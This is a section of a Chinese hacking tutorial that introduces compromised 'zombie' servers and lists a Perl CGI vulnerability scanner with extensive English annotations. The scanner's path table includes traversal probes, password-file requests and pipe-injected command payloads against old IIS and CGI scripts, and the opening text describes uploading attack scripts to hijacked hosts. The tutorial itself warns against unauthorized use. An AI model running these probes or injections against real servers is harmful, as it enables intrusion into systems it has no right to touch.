第六章 工具的编写:第四节、Perl程序
很多黑客教程里面都有“肉鸡”的名词,究竟这是指什么呢?这是指具有利用价值的系统,例如当黑客使用的系统System经过攻击掌握了一台叫做Clink的系统之后,这台被控制的Clink就称作“肉鸡”,黑客可以直接在它上面对其他系统继续攻击。Clink如果具有Perl程序解释权限,那么对黑客来说就具备了基本的利用价值,因为Perl可以编写出很多具有攻击力的程序,在服务器Clink上运行这些程序显而易见要比在System上运行快得多,对攻击者来说也更难被追踪到真实来源。需要明确指出:控制他人系统并以它为跳板继续攻击,属于未经授权的访问,在绝大多数国家都是违法行为;本节介绍的扫描器只应在自己拥有的、或已取得书面授权的系统上运行。
在http://www.hack-net.com/上可以找到很多利用Perl编写的扫描器、攻击程序,将这些程序上传到具有Perl权限的服务器上,然后用chmod把文件改为可执行(例如755),之后通过浏览器直接访问就可以完成相应的操作了。注意这类CGI以Web服务器进程的身份运行,其权限也受该身份限制;文中提到的站点和程序都是2000年前后的历史资料,相关链接可能已经失效。
本书前面在编写电子邮件炸弹的时候,简单的介绍过这种程序,现在我们再看看如何使用Perl编写漏洞扫描软件:
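#! /usr/bin/perl
# ============================================================================
# CGI vulnerability scanner
#
# For every entry of %exploits the scanner connects to port 80 of the target,
# sends "GET <path> HTTP/1.0" and reports the entry when the status code is
# 200.  The table below is its whole knowledge base: the key is a display
# label (some carry the Bugtraq ID of the advisory), the value is the request
# path.  The entries date from about 1998-2000 (Bugtraq IDs below 1000); a
# 200 reply only shows that the path is served, not that the hole is present.
#
# Table repairs relative to the printed listing:
#  - ellipsis characters (U+2026) in three paths were decoded back to ASCII
#    dots; the listing was evidently mangled by a word processor, so the
#    exact original payloads should be checked against the Infinity Scanner
#    source this program is based on;
#  - the '::$DATA' entry is single-quoted: inside double quotes Perl
#    interpolates the variable $DATA and the path collapsed to "/index.asp::";
#  - three entries shared the key "Bugtraq ID 770", so only the last one
#    survived in the hash and the alibaba.pl check was silently dropped.
# The script does not enable strict or warnings: $version, %exploits,
# $usehostlist, $storelogs and $verbosemode are package globals shared with
# the subroutines below.
# ============================================================================
use Socket;

$version = "Cgi Scanner v1.0";

%exploits = (
    "VTI PVT [service.pwd]"                      => "/_vti_pvt/service.pwd",
    "VTI PVT [administrators.pwd]"               => "/_vti_pvt/administrators.pwd",
    "VTI BIN [shtml.exe]"                        => "/_vti_bin/shtml.exe",
    "un1g1.1"                                    => "/cgi-bin/unlg1.1",
    "gH.cgi"                                     => "/cgi-bin/gH.cgi",
    "nph-test-cgi(Bugtraq ID 686)"               => "/cgi-bin/nph-test-cgi",
    "nph-publish"                                => "/cgi-bin/nph-publish",
    "Handler(Bugtraq ID 380)"                    => "/cgi-bin/handler",
    "Webdist.cgi(Bugtraq ID 374)"                => "/cgi-bin/webdist.cgi",
    "faxsurvey"                                  => "/cgi-bin/faxsurvey",
    "wwwboard.cgi"                               => "/cgi-bin/wwwboard.cgi",
    "campas"                                     => "/cgi-bin/campas",
    "AT-admin.cgi"                               => "/cgi-bin/AT-admin.cgi",
    "filemail.pl"                                => "/cgi-bin/filemail.pl",
    "info2www"                                   => "/cgi-bin/info2www",
    "files.pl"                                   => "/cgi-bin/files.pl",
    "Finger"                                     => "/cgi-bin/finger",
    "classifieds.cgi"                            => "/cgi-bin/classifieds.cgi",
    "environ.cgi"                                => "/cgi-bin/environ.cgi",
    "Webbbs.cgi(Bugtraq ID 803)"                 => "/cgi-bin/webbbs.cgi",
    "whois_raw.cgi(Bugtraq ID 304)"              => "/cgi-bin/whois_raw.cgi",
    "Anyboard.cgi"                               => "/cgi-bin/AnyBoard.cgi",
    "/scripts/issadmin/bdir.htr"                 => "/scripts/issadmin/bdir.htr",
    "Msadc"                                      => "/msadc/Samples/SELECTOR/showcode.asp",
    "/iisadmpwd/aexp2.htr"                       => "/iisadmpwd/aexp2.htr",
    "/iisadmpwd/anot3.htr"                       => "/iisadmpwd/anot3.htr",
    "5daydatacopier.cgi"                         => "/cgi-bin/day5datacopier.cgi",
    "passwd.txt"                                 => "/cgi-bin/passwd.txt",
    "password"                                   => "/cgi-bin/password",
    "/etc/group"                                 => "/etc/group",
    "/~root"                                     => "/~root",
    "Upload.pl"                                  => "/cgi-bin/upload.pl",
    "formmail.pl"                                => "/cgi-bin/formmail.pl",
    "sendform.cgi"                               => "/cgi-bin/sendform.cgi",
    "_AuthChangeUrl"                             => "/cgi-bin/_AuthChangeUrl",
    "No-such-file.pl"                            => "/scripts/no-such-file.pl",
    # Next two: dot runs decoded from ellipsis characters; the dot count may
    # differ from the original "dot dot" traversal probe -- verify.
    "/......"                                    => "/....../",
    "To long!"                                   => "/.html/............./config.sys",
    "/_vti_pvt/shtml.exe"                        => "/_vti_pvt/shtml.exe",
    "/_vti_inf.html"                             => "/_vti_inf.html",
    "cgi-shl/win-c-sample.exe"                   => "/cgi-shl/win-c-sample.exe",
    "default.asp"                                => "/default.asp",
    "Server%20logfile"                           => "/server%20logfile",
    "dcmcfg.nsf"                                 => "/domcfg.nsf/?open",
    "Webhits.exe"                                => "/scripts/samples/search/webhits.exe",
    "fpexplore.exe"                              => "/cgi-bin/fpexplore.exe",
    "gueryhit.htm"                               => "/samples/search/queryhit.htm",
    "ss.cfg"                                     => "/ss.cfg",
    "visadmin.exe"                               => "/cgi-bin/visadmin.exe?user=guest",
    # Decoded from "dir….windows"; the listing also lost backslashes
    # elsewhere, so the payload may have been "dir..\..\windows" -- verify.
    "input.bat(Bugtraq ID 762)"                  => "/cgi-bin/input.bat?|dir....windows",
    # Single quotes: "$DATA" would otherwise be interpolated as a variable.
    'index.asp::$DATA'                           => '/index.asp::$DATA',
    "//../../config.sys"                         => "//../../config.sys",
    "/../../config.sys"                          => "/../../config.sys",
    "main.asp%81"                                => "/main.asp%81",
    "/adsamples/config/site.csc"                 => "/adsamples/config/site.csc",
    "isn.dll"                                    => "/scripts/iisadmin/ism.dll?http/dir",
    "Search.cgi(Bugtraq ID 921)"                 => "/cgi-bin/search.cgi",
    "bb-hist.sh(Bugtraq ID 142)"                 => "/cgi-bin/bb-hist.sh",
    "kcms_configure(Bugtraq ID 452)"             => "/usr/openwin/bin/kcms_configure",
    # NOTE(review): spaces make the request line malformed ("GET /cgi-bin/s97_cgi
    # s97r_cgi tasmgr HTTP/1.0"); this looks like three paths collapsed into one
    # entry.  Kept as printed -- verify and split.
    "Bugtraq ID 162"                             => "/cgi-bin/s97_cgi s97r_cgi tasmgr",
    "ppdscgi.exe(Bugtraq ID 491)"                => "/cgi-bin/ppdscgi.exe",
    "dfire.cgi(Bugtraq ID 564)"                  => "/cgi-bin/dfire.cgi",
    "guestbook.pl(Bugtraq ID 776)"               => "/cgi-bin/guestbook.pl",
    "Anyform.cgi(Bugtraq ID 719)"                => "/cgi-bin/AnyForm.cgi",
    "w3-msql(Bugtraq ID 591, 898)"               => "/cgi-bin/w3-msql",
    # Formerly three entries all keyed "Bugtraq ID 770"; given distinct keys so
    # both probes survive (the exact duplicate was dropped).  "c:file.txt" has
    # probably lost a backslash as well.
    "tst.bat(Bugtraq ID 770)"                    => "/cgi-bin/tst.bat|type%20c:file.txt",
    "alibaba.pl(Bugtraq ID 770)"                 => "/cgi-bin/alibaba.pl|dir",
    "status.cgi(Bugtraq ID 914)"                 => "/cgi-bin/status.cgi",
    "FormHandler 1.0, 2.0(Bugtraq ID 799, 798)"  => "/cgi-bin/FormHandler.cgi",
    "webwho.pl(Bugtraq ID 892)"                  => "/cgi-bin/webwho.pl",
    "carbo.dll"                                  => "/carbo.dll",
);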
# Program entry: show the interactive menu (menu() loops until Exit).
menu();
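# Print the main menu, read one selection from STDIN and dispatch it.
#
# Every choice other than "5" ends by calling menu() again, so the user is
# back at this menu after a scan or a help screen (the original obtained the
# same effect from a dangling else).  Fixes: the read operator lost in the
# printed listing is restored, chomp() replaces chop() so a final line without
# a newline keeps its last character, and EOF on STDIN exits instead of
# redrawing the menu forever.  Reads the package global $version.
sub menu {
    print "\n\n";
    print " $version\n\n";
    print " Based on source code of [ Infinity Scanner v1.3 ]\n\n";
    print " 1) Cgi Sonar\n";
    print " 2) About Cgi Sonar\n";
    print " 3) Exploit Info\n";
    print " 4) Help\n";
    print " 5) Exit\n";
    print "Command: ";

    my $selection = <STDIN>;
    exitcgisonar() unless defined $selection;   # EOF: nothing more to read
    chomp $selection;
    $selection =~ s/^\s+|\s+$//g;

    my %dispatch = (
        '1' => \&cgiscanner,
        '2' => \&infomessage,
        '3' => \&exploitinfo,
        '4' => \&helpmessage,
        '5' => \&exitcgisonar,
    );
    if (my $action = $dispatch{$selection}) {
        $action->();
    }
    # Unknown input and every non-exit choice return to the menu.
    menu() unless $selection eq '5';
}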
# Menu choice 1: scan either a list of hosts or a single host.
#
# $usehostlist is a package global; nothing in this listing assigns it, so in
# practice the single-host path is always taken.  Set it to "yes" before
# calling menu() to scan a server list file instead.
sub cgiscanner {
    my $want_list = (defined $usehostlist and $usehostlist eq "yes");
    return $want_list ? exploituselist() : exploitnouselist();
}
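# Scan every host named in a user-supplied list file, one host per line.
#
# Reads the list path and the logging answer from STDIN, stores the answer in
# the package global $storelogs that cgiscannerloop() checks, then scans each
# non-blank line.  Fixes over the original:
#  - three-argument open with a lexical handle, so a name such as
#    ">gotcha.log" or "cmd|" typed at the prompt is treated as a file name
#    and not as an output redirection or a pipe;
#  - &dienice(), which is never defined in this file, is replaced by die;
#  - the read operators lost in the printed listing are restored, chomp()
#    replaces chop(), and the missing semicolon after chop($host) is fixed.
# Returns to the menu by falling back to menu()'s own redisplay rather than
# nesting a new menu() call inside every scan.
sub exploituselist {
    print "\nServerlist Filename: ";
    my $hostlist = <STDIN>;
    return unless defined $hostlist;
    chomp $hostlist;
    open(my $in, '<', $hostlist) or die "Can't open $hostlist: $!\n";
    my @hosts = <$in>;
    close($in);

    print "\nEnable Logging?(Saved as gotcha.log) [yes or no]: ";
    $storelogs = <STDIN>;
    $storelogs = '' unless defined $storelogs;
    chomp $storelogs;

    foreach my $target (@hosts) {
        chomp $target;
        next if $target =~ /^\s*$/;
        cgiscannerloop($target);
    }
}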
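# Scan a single host typed at the prompt (menu choice 1 without a host list).
#
# Reads the host and the logging answer from STDIN; the answer goes into the
# package global $storelogs that cgiscannerloop() checks.  Fixes over the
# original: restored read operators, chomp() instead of chop(), the "Emable"
# typo in the prompt, an empty host name no longer reaches inet_aton(), and
# the sub returns to menu() (which redisplays itself) instead of calling
# menu() recursively.
sub exploitnouselist {
    print "\nHost: ";
    my $target = <STDIN>;
    return unless defined $target;
    chomp $target;
    $target =~ s/^\s+|\s+$//g;
    return if $target eq '';

    print "\nEnable Logging?(Saved as gotcha.log) [yes or no]: ";
    $storelogs = <STDIN>;
    $storelogs = '' unless defined $storelogs;
    chomp $storelogs;

    cgiscannerloop($target);
}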
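# Probe one host for every path in %exploits and report those answered 200.
#
# Argument: the host name or IP address to scan.
# Reads the package globals %exploits, $storelogs ("yes" appends hits to
# gotcha.log in the current directory) and $verbosemode ("y" also prints
# misses; nothing in this listing sets it).  Return value is not meaningful.
#
# Fixes over the original: the host is resolved once before the loop and an
# unresolvable host returns early instead of creating (and never closing) a
# socket per entry; a refused connection is reported and aborts the scan
# instead of yielding a misleading "No exploitable holes found"; a lexical
# socket is always closed; the request uses the CRLF line endings HTTP
# requires and carries a Host header so name-based virtual hosts serve the
# intended site; a server that closes without a status line no longer feeds
# undef to split(); the log is opened with three-argument open; entries are
# probed in sorted order so output is reproducible.  Only status 200 counts
# as a hit, so a 403 or a redirect for an existing file is a false negative,
# and a site that answers 200 for every URL yields nothing but false
# positives -- confirm every hit by hand.
sub cgiscannerloop {
    my ($target) = @_;
    my $proto = getprotobyname('tcp');

    my $ip = inet_aton($target);
    unless (defined $ip) {
        print "Can't Resolve host!\n";
        return;
    }
    my $server_addr = sockaddr_in(80, $ip);
    my $hits = 0;
    my $log_hits = (defined $storelogs and $storelogs eq "yes");
    my $verbose  = (defined $verbosemode and $verbosemode eq "y");

    print "\n\nChecking $target for known exploits:\n\n";
    foreach my $label (sort keys %exploits) {
        my $path = $exploits{$label};

        socket(my $sock, PF_INET, SOCK_STREAM, $proto)
            or do { print "socket: $!\n"; next };
        unless (connect($sock, $server_addr)) {
            print "Can't connect to $target port 80: $!\n";
            close($sock);
            return;
        }
        unless (send($sock, "GET $path HTTP/1.0\r\nHost: $target\r\n\r\n", 0)) {
            close($sock);
            next;
        }
        my $status_line = <$sock>;   # first response line: "HTTP/1.x CODE REASON"
        close($sock);
        next unless defined $status_line;

        my ($http, $code) = split(/ /, $status_line);
        if (defined $code and $code eq '200') {
            print "Exploit Found: $label\nLocation: $path\n\n";
            $hits++;
            if ($log_hits) {
                open(my $log, '>>', 'gotcha.log')
                    or die "Couldn't open gotcha.log for writing. Please make sure the file exists and is writable.\n";
                print $log "Exploit Found: $label\nServer: $target\nLocation: $path\n\n";
                close($log);
            }
        }
        elsif ($verbose) {
            print "$label Exploits Not Found\n";
        }
    }
    print "No exploitable holes found on host $target\n" if $hits == 0;
}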
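# Menu choice 2: print the about text and wait for Enter.
#
# The line read from STDIN is discarded; it only pauses the screen.  Restores
# the "\n" escapes and the <STDIN> operator lost in the printed listing.
sub infomessage {
    print " Cgi Scanner v1.0 by Maxview\n\n";
    my $discard = <STDIN>;
}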
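# Menu choice 3: tell the user where to look up the reported exploits.
#
# Prints a fixed help text and waits for Enter (the input is discarded).
# Restores the "\n" escapes and the <STDIN> operator lost in the printed
# listing and decodes the word-processor ellipsis/quote characters back to
# ASCII.  The sites named date from around 2000 and may no longer resolve;
# the Bugtraq IDs themselves are still searchable in current vulnerability
# databases.
sub exploitinfo {
    print <<"END_INFO";
 Exploit Info

 If you are having trouble finding info on the exploits found
 on a certain host you have scanned... I strongly suggest you 
 look for info on the exploits found on a host at the following
 sites... http://www.securityfocus.com, www.rootshell.com, or
 http://packetstorm.securify.com... If you are confused about
 the Bugtraq ID's... Then simply go to http://www.securityfocus.com
 /level2/bottom.html?go=vulnerabilities and click on the Bugtraq ID
 tab and type in the ID number in the blank box... All the info
 you will need will be in the newly loaded page...

END_INFO
    print "Press enter to continue...";
    my $discard = <STDIN>;
}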
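# Menu choice 4: print the help screen and wait for Enter.
#
# The numbering now matches menu(): the original help listed four commands
# and omitted "3) Exploit Info", so "Help" and "Exit" were shown under the
# wrong numbers.  Restores the "\n" escapes and the <STDIN> operator lost in
# the printed listing; the input line is discarded.
sub helpmessage {
    print <<"END_HELP";
 Help

 Cgi Scanner command's

 1) Cgi Scanner- Scans for known Cgi exploits on a remote host...
 2) About Cgi Scanner- Informs you about Cgi Scanner...
 3) Exploit Info- Where to look up the Bugtraq IDs of reported exploits...
 4) Help- Informs you on certain aspects of Cgi Scanner...
 5) Exit- It simply exits you out of the Cgi Scanner...

 Sub command's

 Host:- Allows you to type in the IP of the host you wish
 to scan (e.g. 127.0.0.1)...
 Enable Logging- Logs exploits found, Host IP, etc...
 Thank you for using Cgi Scanner

END_HELP
    print "Press enter to continue...";
    my $discard = <STDIN>;
}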
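# Menu choice 5: leave the program.
#
# Exits with status 0: this is a normal, user-requested exit, and the
# original's `exit 1` told the calling shell that the scanner had failed.
sub exitcgisonar { exit 0; }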
程序看上去很复杂,但实际上和C语言编写的漏洞扫描其原理是一样的,都是先通过Socket与服务器建立连接,然后发送GET请求查询指定的文件是否存在,如果服务器返回状态码200则报告文件的位置。需要注意两点。第一,本页排版时丢失了`<STDIN>`、`<INF>`、`<CLIENT>`这类尖括号读取操作符以及`\n`中的反斜杠,因此`chop($selection=);`应读作`chop($selection=<STDIN>);`,`"nn"`应读作`"\n\n"`,原样抄录是无法运行的。第二,这种扫描方式只看状态码是否为200:对所有URL都返回200(例如自定义错误页)的站点会产生大量误报,而对存在的文件返回403或302的情况则会漏报;所列漏洞(Bugtraq ID均在1000以下)基本属于1998—2000年的老问题。这个程序中定义了很多种不同的漏洞,作为学习者应该努力掌握这些漏洞的原理、利用方法以及相应的修补方法,并且只在取得授权的系统上进行扫描。
2008/01/20 19:34:12